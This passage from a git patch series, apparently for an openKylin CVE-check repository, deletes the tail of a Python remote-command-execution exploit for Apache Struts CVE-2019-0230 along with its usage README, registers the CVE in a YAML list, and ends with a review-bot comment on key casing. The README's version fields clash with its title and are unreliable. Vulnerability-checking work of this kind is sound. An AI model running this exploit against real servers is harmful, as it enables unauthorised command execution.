action='store', help='Target -address: http(s)://target.com/index.action') - parser.add_argument('-command', action='store', - help='Command to execute: touch /tmp/pwn') - parser.add_argument('-debug', action='store', default=False, -help='Enable debugging: False') - parser.add_argument('-proxy', action='store', default='', -help='Enable proxy: 10.10.10.10:8080') - - if len(argv) == 1: - parser.print_help() - exit(1) - options = parser.parse_args() - - exp = Exploit( - proxy_address=options.proxy, - target=options.target - ) - - if options.debug: - exp.debug() - stdout.write('target %s debug %s proxy %s\n' % ( - options.target, options.debug, options.proxy - )) - - result = exp.send_payload(command=options.command) - stdout.write('Response: %d\n' % result.status_code) - - except Exception as error: - -stderr.write('error in main %s' % str(error)) \ No newline at end of file diff --git a/cve/apache-Struts/CVE-2019-0230/README.md b/cve/apache-Struts/CVE-2019-0230/README.md deleted file mode 100644 index b9a4f94c..00000000 --- a/cve/apache-Struts/CVE-2019-0230/README.md +++ /dev/null @@ -1,21 +0,0 @@ -# Apache Struts 2.5.20 - Double OGNL evaluation -Exploit Author: Lucas Souza https://lsass.io -Vendor Homepage: https://apache.org/ -Version: 2.4.49 -Tested on: 2.4.49 -CVE : CVE-2019-0230 -Credits: Ash Daulton and the cPanel Security Team -# Usage -``` -python CVE-2019-0230.py + --target : Target address --command : Command to execute --debug : Enable debugging --proxy : Enable proxy -``` -# reference -http://packetstormsecurity.com/files/160108/Apache-Struts-2.5.20-Double-OGNL-Evaluation.html -http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html -https://cwiki.apache.org/confluence/display/ww/s2-059 -https://launchpad.support.sap.com/#/notes/2982840 -https://www.oracle.com/security-alerts/cpujan2021.html \ No newline at end of file -- Gitee From d8d208399272220ff2793cf48748bb3d85467fc9 Mon Sep 17 00:00:00 2001 
From: fanyunpeng Date: Thu, 16 Mar 2023 09:14:17 +0000 Subject: [PATCH 18/19] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/apache-Struts/yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache-Struts/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache-Struts/yaml/.keep diff --git a/cve/apache-Struts/yaml/.keep b/cve/apache-Struts/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8ac96bed652a31691d7a66b8d41f936b16b8fac2 Mon Sep 17 00:00:00 2001 From: fanyunpeng Date: Thu, 16 Mar 2023 09:15:36 +0000 Subject: [PATCH 19/19] update openkylin_list.yaml. Signed-off-by: fanyunpeng --- openkylin_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index dfa49367..caeacc6e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -26,6 +26,8 @@ cve: - CVE-2020-13935 apache-unomi: - CVE-2020-13942 + apache-struts: + - CVE-2019-0230 Influx-DB: - CVE-2019-20933 linux-kernel: -- Gitee
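Review bot: The new key is spelled `apache-struts` while every directory this series creates is `cve/apache-Struts/…` with a capital S; if any tooling derives the directory from the list key on a case-sensitive filesystem the entry will not resolve, so align the two (the neighbouring keys suggest the lower-case form, in which case the directories should be renamed instead). If the `cve:` mapping is kept in alphabetical order, `apache-struts` also belongs before `apache-unomi`, not after it. The `cve:` mapping begins before this hunk, so I cannot see how the list is consumed.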